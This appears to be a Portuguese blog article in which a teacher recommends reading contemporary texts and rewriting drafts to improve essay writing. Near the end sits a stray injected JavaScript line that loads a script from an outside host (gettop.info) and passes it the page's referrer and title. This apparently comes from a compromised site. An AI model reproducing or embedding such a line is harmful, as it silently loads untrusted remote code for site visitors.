Como fazer uma boa redação?

Uma das perguntas que mais respondo no meu cotidiano profissional é: “professor, como posso fazer uma boa redação?” Redigir é, para muitos, um trauma, que necessariamente deve ser superado por aquele que almeja postos melhores em nossa sociedade. E existem recursos para isso! Neste artigo, listarei os dois principais.

O primeiro é a leitura! Mas não desejo falar dessa prática com o romantismo e saudosismo adotado por muitos. Quero te fazer uma pergunta: como você quer produzir um texto escrito, se você nunca vê um texto escrito? Isso é lógico: para aprender a dirigir, você precisou ver alguém dirigindo; para aprender a cozinhar, você precisou ver alguém cozinhando. Para aprender a escrever, veja alguém escrevendo! A fim de alcançar esse objetivo, faça a leitura de textos que apresentem o estilo que você deseja obter.

Aos que precisam fazer redações para vestibulares ou concursos públicos, recomendo a leitura de textos cultos e contemporâneos, como jornais. Neles, você encontrará a linguagem desejada hodiernamente. A leitura de clássicos literários é recomendada para a aquisição de conhecimento, mas não para a aquisição de estilo. O português do século XIX, por exemplo, é bem diferente do português culto atual.

O segundo é a reescritura de textos. As dificuldades de escrita de cada pessoa são individuais. Todo texto feito deve ser reescrito, para que se perceba a melhor forma de expressão das ideias. Garanto que, qualquer pessoa, ao reescrever o próprio texto, encontrará melhores formas de transmitir a mesma informação. A minha sugestão: sempre que você escrever um texto, submeta-o a uma correção (profissional ou não; um amigo por ser seu “corretor”, mesmo que ele não seja um especialista).

Com as considerações feitas pelo corretor, teça a sua reescritura. Esse é o exercício que verdadeiramente aprimora a sua escrita. Conheço pessoas que leem inveteradamente, mas que não conseguem redigir bons textos. Por quê? Por que não “lapidam” suas palavras. Redigir bem é um trabalho de aperfeiçoamento constante.

Esses pilares da boa redação não foram criados por mim, mas por Othon Moacir Garcia, autor de “Comunicação em Prosa Moderna”, obra referência para produção e análise textual. E, em minha prática profissional, percebo o quanto esse filólogo foi assertivo nesse conceito. Vamos estendê-lo à nossa prática redacional?

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário